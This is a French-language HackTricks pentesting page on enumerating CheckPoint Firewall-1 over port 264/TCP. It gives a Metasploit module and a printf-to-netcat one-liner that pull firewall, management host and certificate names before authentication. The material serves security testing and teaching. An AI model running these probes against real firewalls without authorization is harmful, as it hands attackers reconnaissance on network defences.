tip
Apprenez et pratiquez le hacking AWS :HackTricks Training AWS Red Team Expert (ARTE)
Apprenez et pratiquez le hacking GCP : HackTricks Training GCP Red Team Expert (GRTE)
Soutenir HackTricks
- VĂ©rifiez les plans d'abonnement !
- Rejoignez le đŹ groupe Discord ou le groupe telegram ou suivez nous sur Twitter đŠ @hacktricks_live.
- Partagez des astuces de hacking en soumettant des PRs au HackTricks et HackTricks Cloud dépÎts github.
Il est possible d'interagir avec les pare-feu CheckPoint Firewall-1 pour dĂ©couvrir des informations prĂ©cieuses telles que le nom du pare-feu et le nom de la station de gestion. Cela peut ĂȘtre fait en envoyant une requĂȘte au port 264/TCP.
Obtention des noms de pare-feu et de station de gestion
En utilisant une requĂȘte de prĂ©-authentification, vous pouvez exĂ©cuter un module qui cible le CheckPoint Firewall-1. Les commandes nĂ©cessaires pour cette opĂ©ration sont dĂ©crites ci-dessous :
use auxiliary/gather/checkpoint_hostname
set RHOST 10.10.10.10
Lors de l'exécution, le module tente de contacter le service de topologie SecuRemote du pare-feu. Si cela réussit, il confirme la présence d'un pare-feu CheckPoint et récupÚre les noms du pare-feu et de l'hÎte de gestion SmartCenter. Voici un exemple de ce à quoi la sortie pourrait ressembler :
[*] Attempting to contact Checkpoint FW1 SecuRemote Topology service...
[+] Appears to be a CheckPoint Firewall...
[+] Firewall Host: FIREFIGHTER-SEC
[+] SmartCenter Host: FIREFIGHTER-MGMT.example.com
[*] Auxiliary module execution completed
Méthode alternative pour la découverte du nom d'hÎte et du nom ICA
Une autre technique implique une commande directe qui envoie une requĂȘte spĂ©cifique au pare-feu et analyse la rĂ©ponse pour extraire le nom d'hĂŽte et le nom ICA du pare-feu. La commande et sa structure sont les suivantes :
printf '\x51\x00\x00\x00\x00\x00\x00\x21\x00\x00\x00\x0bsecuremote\x00' | nc -q 1 10.10.10.10 264 | grep -a CN | cut -c 2-
La sortie de cette commande fournit des informations détaillées concernant le nom du certificat du pare-feu (CN) et l'organisation (O), comme démontré ci-dessous :
CN=Panama,O=MGMTT.srv.rxfrmi
Références
- https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk69360
- https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html#check-point-firewall-1-topology-port-264
tip
Apprenez et pratiquez le hacking AWS :HackTricks Training AWS Red Team Expert (ARTE)
Apprenez et pratiquez le hacking GCP : HackTricks Training GCP Red Team Expert (GRTE)
Soutenir HackTricks
- VĂ©rifiez les plans d'abonnement !
- Rejoignez le đŹ groupe Discord ou le groupe telegram ou suivez nous sur Twitter đŠ @hacktricks_live.
- Partagez des astuces de hacking en soumettant des PRs au HackTricks et HackTricks Cloud dépÎts github.